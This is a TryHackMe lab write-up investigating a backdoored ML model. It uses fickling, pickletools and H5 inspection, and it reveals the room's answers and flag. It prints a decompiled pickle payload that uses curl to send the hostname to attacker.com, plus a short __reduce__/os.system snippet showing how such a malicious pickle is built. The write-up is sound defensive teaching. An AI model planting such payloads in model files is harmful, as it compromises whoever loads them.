Payload (TryHackMe)


Introduction

The SOC alert arrived at 03:14. No deployments were scheduled. No changes were logged.

That single line sets the tone for one of the most quietly dangerous attack scenarios in modern AI infrastructure: a compromised ML model running silently in production for 21 days before anyone noticed. Not because the defences failed, but because nobody was looking at the model itself.

This write-up covers my investigation of Incident #2024-SC-0847 from TryHackMe's AI/ML Supply Chain Security room. The scenario: a code review model was swapped out for a malicious replacement sourced from an unverified Hugging Face organisation. The payload exfiltrated host identity data to an attacker-controlled server. What replacement did the engineering team stage to fix the problem? Also compromised.

What makes this attack class interesting from a security research perspective is where it lives — not in the application layer, not in the network, but in the model artifact itself. The tools that catch it are not your standard Web2 or Web3 security stack. They are Fickling, ModelScan, and H5 inspection tooling built specifically for the AI/ML supply chain. If you have never heard of them, that is exactly the problem this room is designed to highlight.

The Incident

The SOC alert arrived at 03:14. No deployments were scheduled. No changes were logged. The ML inference server had been making outbound HTTPS connections to an unrecognised address, and the connections were blocked only when the automated detection rule triggered.

You have been called in. The incident materials are waiting at /opt/supply-chain/incident/. Every tool you need is already installed.

The incident directory contains four things: deployment and network logs in logs/, the production model currently running in models/, a candidate replacement the engineering team staged but has not yet deployed, and a clean baseline for comparison.

Start with the logs to establish the timeline, then examine the production model, and finally assess the candidate replacement before the engineering team deploys it.

Note: All tools from the previous rooms are available: pickletools, fickling, modelscan, sha256sum, inspect_h5_model.py.

Answer the questions below

Read the deployment log at /opt/supply-chain/incident/logs/deployment.log. The replacement model came from a different organisation than the original. What is the name of that organisation? trustworthy-ai-lab

analyst@tryhackme-2204:~$ cat /opt/supply-chain/incident/logs/deployment.log
[2024-01-05 09:15:22] INFO  Model registry: pulling code-review-bert v1.0.0
[2024-01-05 09:15:23] INFO  Source: huggingface.co/verified-ml-team/code-review-bert
[2024-01-05 09:15:25] INFO  Loaded model: original_model.pkl (sha256: 793bb2f5bfdf4a1c...)
[2024-01-05 09:15:26] INFO  Model deployed to production inference server
[2024-01-26 14:32:10] INFO  Model update requested by ml-engineer@trytrainme.com
[2024-01-26 14:32:12] INFO  Source: huggingface.co/trustworthy-ai-lab/code-review-bert-v2
[2024-01-26 14:32:14] WARN  New source organisation detected: trustworthy-ai-lab
[2024-01-26 14:32:15] INFO  Loaded model: production_model.pkl
[2024-01-26 14:32:16] INFO  Model deployed to production inference server
[2024-02-16 03:14:00] ALERT SOC automated alert: unusual outbound HTTPS traffic detected
[2024-02-16 03:14:01] ALERT Destination: attacker.com:443
[2024-02-16 03:14:33] INFO  Incident #2024-SC-0847 created - investigation required
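
Note that the log records a SHA-256 digest for the original artifact (truncated in the log output to 793bb2f5bfdf4a1c...). Comparing that digest against the registry's published value is the cheapest control that would have flagged this swap. A minimal sketch in Python, assuming the full known-good digest is available from the model registry (the KNOWN_GOOD_DIGEST placeholder below is hypothetical):

import hashlib

def sha256_of(path: str) -> str:
    # Hash in 1 MiB chunks so large model files never load fully into memory
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

# Hypothetical: the log only shows the prefix 793bb2f5bfdf4a1c...
KNOWN_GOOD_DIGEST = "<full digest from the model registry>"
actual = sha256_of("/opt/supply-chain/incident/models/production_model.pkl")
print("match" if actual == KNOWN_GOOD_DIGEST else f"MISMATCH: {actual}")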

How many days passed between the replacement model being deployed and the SOC alert firing? 21

  • Based on the logs above: from the day the model update was deployed (2024-01-26) to the day the SOC alert fired (2024-02-16), as the quick check below confirms.
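
A quick sanity check with the standard library:

from datetime import date

deployed = date(2024, 1, 26)  # replacement model deployed (deployment.log)
alerted = date(2024, 2, 16)   # SOC automated alert fired
print((alerted - deployed).days)  # -> 21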

Decompile the production model. What Python function does the payload use to execute the shell command? system

analyst@tryhackme-2204:~$ fickling --check-safety /opt/supply-chain/incident/models/production_model.pkl
analyst@tryhackme-2204:~$ fickling --print-results /opt/supply-chain/incident/models/production_model.pkl
from os import system
_var0 = system('curl "http://attacker.com/beacon" -d "host=$(hostname)"')
result0 = _var0
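
Fickling's decompilation shows the payload lives in the pickle stream itself, not in the model weights. For context, here is a minimal sketch of how this class of payload is typically planted (not the room's actual artifact): pickle's __reduce__ hook lets an object dictate a callable to invoke at load time, so os.system runs the moment anyone calls pickle.load():

import os
import pickle

class Beacon:
    # pickle calls __reduce__ when serialising; the (callable, args) tuple
    # it returns is invoked during deserialisation, i.e. on pickle.load()
    def __reduce__(self):
        cmd = 'curl "http://attacker.com/beacon" -d "host=$(hostname)"'
        return (os.system, (cmd,))

# The written file now carries the command as executable pickle opcodes
with open("malicious_model.pkl", "wb") as f:
    pickle.dump(Beacon(), f)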

What shell command does the payload use to capture the host's identity? hostname

analyst@tryhackme-2204:~$ fickling --json-output /tmp/out.json /opt/supply-chain/incident/models/production_model.pkl && cat /tmp/out.json
from os import system
_var0 = system('curl "http://attacker.com/beacon" -d "host=$(hostname)"')
result0 = _var0
cat: /tmp/out.json: No such file or directory
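
The --json-output attempt did not leave a file behind on this box, but the decompiled stream above already answers the question. For a second opinion that needs nothing beyond the standard library, pickletools can disassemble the opcode stream without executing anything; an opcode resolving os.system followed by a REDUCE call is the giveaway:

import pickletools

# Disassembles the pickle opcodes without running them; watch for
# GLOBAL/STACK_GLOBAL resolving os.system followed by REDUCE
with open("/opt/supply-chain/incident/models/production_model.pkl", "rb") as f:
    pickletools.dis(f)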

The beacon capture log shows the HTTP method used in the outbound request. What is it? POST

analyst@tryhackme-2204:~$ cat /opt/supply-chain/incident/logs/beacon_capture.log
[2024-02-16 03:13:47] SESSION beacon-4821 ESTABLISHED  src=10.0.1.50  dst=attacker.com:443
[2024-02-16 03:13:47] REQUEST POST /beacon HTTP/1.1
[2024-02-16 03:13:47] HOST attacker.com
[2024-02-16 03:13:47] PAYLOAD host=ml-server-prod-01&id=THM{b4ckd00r_1n_
[2024-02-16 03:13:48] SESSION beacon-4821 BLOCKED  bytes_captured=51  reason=SOC_RULE_4821

The engineering team staged candidate_model.h5 as a replacement but have not yet deployed it. Run inspect_h5_model.py against it. What is the name of the suspicious layer it contains? manipulate_output

analyst@tryhackme-2204:~$ python3 /opt/supply-chain/tools/inspect_h5_model.py /opt/supply-chain/incident/models/candidate_model.h5

=== Architecture Inspection: candidate_model.h5 ===

  Total layers: 5

  [OK]      InputLayer           input_layer_2
  [OK]      Flatten              flatten_2
  [OK]      Dense                dense_4
  [OK]      Dense                dense_5
  [WARNING] Lambda               manipulate_output (function: manipulate_output)
            exfil_suffix: pl41n_s1ght}

  RESULT: 1 layer(s) require review
    - Lambda (manipulate_output): Can contain arbitrary Python code that executes at inference time
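
inspect_h5_model.py is room-provided tooling, but the same architecture review can be done with plain h5py: a standard Keras .h5 file stores its architecture as JSON in the model_config root attribute, and any Lambda layer in that config carries serialised Python that runs at inference time. A minimal sketch, assuming the standard Keras save format:

import json
import h5py

# Keras .h5 files store the architecture as JSON in a root attribute;
# Lambda layers embed serialised Python that executes at inference time
with h5py.File("/opt/supply-chain/incident/models/candidate_model.h5", "r") as f:
    config = json.loads(f.attrs["model_config"])

for layer in config["config"]["layers"]:
    status = "[WARNING]" if layer["class_name"] == "Lambda" else "[OK]     "
    print(status, layer["class_name"], layer["config"]["name"])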

The attacker split the campaign ID across two artefacts to avoid full exposure in any single capture. Examine beacon_capture.log and the candidate model to recover the complete flag. THM{b4ckd00r_1n_pl41n_s1ght}

01&id=THM{b4ckd00r_1n_
            exfil_suffix: pl41n_s1ght}

Conclusion

The flag was hiding in plain sight: THM{b4ckd00r_1n_pl41n_s1ght}, split across two artefacts specifically so no single capture would expose it. Half was in the beacon payload, half embedded in the Lambda layer of the staged replacement model. The attacker had compromised not just the production model but the recovery path too.

Three things stood out from this investigation that I think matter beyond the CTF context:

  • First, the 21-day dwell time. The malicious model was in production from January 26 to February 16 before the SOC rule triggered. It was not a zero-day. It was not an advanced persistent threat. It was a pickle file with four lines of Python that nobody checked before deploying. The attack surface was the trust placed in the Hugging Face organisation name.

  • Second, scanning the serialisation format is not enough. ModelScan flagged the Lambda layer in candidate_model.h5 as MEDIUM: suspicious but not definitive. It took inspect_h5_model.py to read the architecture and name the layer manipulate_output. Static analysis of the serialisation format and static analysis of the model architecture are two different floors of the same building. Both are required.

  • Third, the replacement was also poisoned. This is the detail that changes how you think about incident response for AI systems. In a traditional compromise, you isolate, patch, and redeploy. Here, the attacker had already positioned a backdoored replacement in the staging pipeline. Verifying the recovery artifact is not optional; it is part of the investigation.

The tooling to catch all of this exists: Fickling for pickle decompilation, ModelScan for multi-format artifact scanning, H5 inspection for Keras architecture review, and SHA256 checksums for provenance verification. What is missing in most organisations is the process that makes running these tools mandatory before any model reaches production.

That is the gap AI security research is trying to close right now, and why I think this is one of the more important rooms on TryHackMe for anyone working at the intersection of security and ML systems.
